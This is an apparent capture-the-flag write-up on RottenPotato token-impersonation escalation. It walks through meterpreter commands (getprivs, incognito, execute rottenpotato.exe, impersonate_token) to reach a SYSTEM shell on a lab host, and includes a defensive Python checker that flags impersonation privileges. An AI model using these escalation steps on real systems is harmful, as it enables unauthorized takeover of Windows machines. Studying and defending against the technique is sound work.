RottenPotato
The info on this page was extracted from this post.
Service accounts usually hold special privileges (SeImpersonatePrivilege), and this can be abused to escalate privileges.
I won't go into the details on how this exploit works, the article above explains it far better than I ever could.
Let's check our privileges with meterpreter:

```
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
```
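As an added triage check (not part of the original post), the following Python parses a privilege listing in either the meterpreter `getprivs` format shown above or the `whoami /priv` format, and reports whether the impersonation privileges this escalation depends on are held by the token. A defender can run it over listings collected from service accounts to find which ones carry this exposure. All sample listings are constructed for the example (the meterpreter one is copied from the listing above); the account names are placeholders.

```python
import re
from typing import Dict, Set

# Privileges that let a process adopt another security context. The page's
# precondition for potato-style escalation is that the compromised service
# account holds one of them.
IMPERSONATION_PRIVILEGES = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
}

# One privilege per line: `whoami /priv` appends a description and a State
# column, meterpreter's getprivs prints the bare name (enabled ones only).
_PRIV_LINE = re.compile(r"^\s*(Se\w+Privilege)\b(?:.*?\b(Enabled|Disabled))?\s*$")


def parse_privileges(listing: str) -> Dict[str, bool]:
    """Map privilege name -> enabled, from getprivs or whoami /priv output."""
    privs: Dict[str, bool] = {}
    for line in listing.splitlines():
        m = _PRIV_LINE.match(line)
        if m:
            # getprivs has no state column and lists only enabled privileges
            privs[m.group(1)] = (m.group(2) or "Enabled") == "Enabled"
    return privs


def impersonation_exposure(listing: str) -> Set[str]:
    """Impersonation privileges present in the token, enabled or not.

    A privilege that shows as Disabled is still held by the token and can be
    re-enabled by the process itself, so presence is what counts.
    """
    return set(parse_privileges(listing)) & IMPERSONATION_PRIVILEGES


def describe(account: str, listing: str) -> str:
    """One-line finding for a report."""
    exposed = impersonation_exposure(listing)
    if not exposed:
        return f"{account}: no impersonation privileges"
    return f"{account}: EXPOSED via {', '.join(sorted(exposed))}"


# Constructed sample: the meterpreter getprivs listing from the page.
METERPRETER_GETPRIVS = """\
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
"""

# Constructed sample in `whoami /priv` format: a service account whose
# impersonation privilege is present but currently disabled.
WHOAMI_SERVICE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Disabled
"""

# Constructed sample: an ordinary interactive user with no impersonation rights.
WHOAMI_USER = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
"""

if __name__ == "__main__":
    # Placeholder account names; the listings are the constructed samples above.
    for name, listing in [("svc_placeholder_a", METERPRETER_GETPRIVS),
                          ("svc_placeholder_b", WHOAMI_SERVICE),
                          ("user_placeholder", WHOAMI_USER)]:
        print(describe(name, listing))
```

The check treats a Disabled impersonation privilege as exposure on purpose: a disabled privilege is still in the token and the process can enable it itself, so only removing the privilege from the account (or running the service under an account that never receives it) actually closes the gap.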
Excellent, it looks like we have the privileges we need to perform the attack. Let's upload rottenpotato.exe.
Back in our meterpreter session, we load the incognito extension.
```
meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
NT SERVICE\SQLSERVERAGENT
NT SERVICE\SQLTELEMETRY
TALLY\Sarah

Impersonation Tokens Available
========================================
No tokens available
```
We can see we currently have no Impersonation Tokens. Let's run the Rotten Potato exploit.

```
meterpreter > execute -f rottenpotato.exe -Hc
Process 3104 created.
Channel 2 created.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
NT SERVICE\SQLSERVERAGENT
NT SERVICE\SQLTELEMETRY
TALLY\Sarah

Impersonation Tokens Available
========================================
NT AUTHORITY\SYSTEM
```
We need to quickly impersonate the token or it will disappear.
```
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
Success! We have our SYSTEM shell and can grab the root.txt file!